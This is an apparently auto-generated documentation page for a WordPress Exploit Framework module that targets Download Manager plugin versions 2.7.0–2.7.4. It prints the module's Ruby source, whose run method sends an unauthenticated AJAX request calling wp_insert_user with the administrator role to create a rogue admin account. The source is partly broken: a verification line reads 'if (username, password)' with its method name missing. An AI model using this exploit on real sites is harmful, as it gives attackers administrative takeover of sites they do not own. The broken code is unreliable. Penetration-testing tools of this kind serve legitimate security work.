Class: Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation

Inherits:
Module
  • Object
show all
Includes:
Wpxf, WordPress::Login
Defined in:
lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeDownloadManagerPrivilegeEscalation

Returns a new instance of DownloadManagerPrivilegeEscalation.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 9

def initialize
  super

  update_info(
    name: 'Download Manager Privilege Escalation',
    desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\
          'allows unauthenticated users to create new admin users '\
          'due to lack of validation wpdm_ajax_call_exec.',
    author: [
      'Mickael Nadeau', # Vulnerability discovery
      'rastating'       # WPXF module
    ],
    references: [
      ['EDB', '35533'],
      ['WPVDB', '7706']
    ],
    date: 'Dec 3 2014'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The username to register with',
      default: Utility::Text.rand_alpha(10)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to register with',
      default: Utility::Text.rand_alpha(rand(10..20))
    )
  ])
end

Instance Method Details

#checkObject 



50
51
52
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 50

def check
  check_plugin_version_from_readme('download-manager', '2.7.5', '2.7.0')
end

#passwordObject 



46
47
48
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 46

def password
  normalized_option_value('password')
end

#runObject 



58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 58

def run
  return false unless super

  emit_info 'Creating new admin user...'
  res = execute_post_request(
    url: full_uri,
    body: {
      'action'      => 'wpdm_ajax_call',
      'execute'     => 'wp_insert_user',
      'user_login'  => username,
      'user_pass'   => password,
      'role'        => 'administrator'
    }
  )

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  emit_info 'Verifying new account...'
  if (username, password)
    emit_success "User #{username} with password #{password} successfully created"
    return true
  else
    emit_error 'Failed to create new user'
    return false
  end

  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  return true
end

#uploads_urlObject 



54
55
56
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 54

def uploads_url
  normalize_uri(wordpress_url_wp_content, 'uploads', 'download-manager-files')
end

#usernameObject 



42
43
44
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 42

def username
  normalized_option_value('username')
end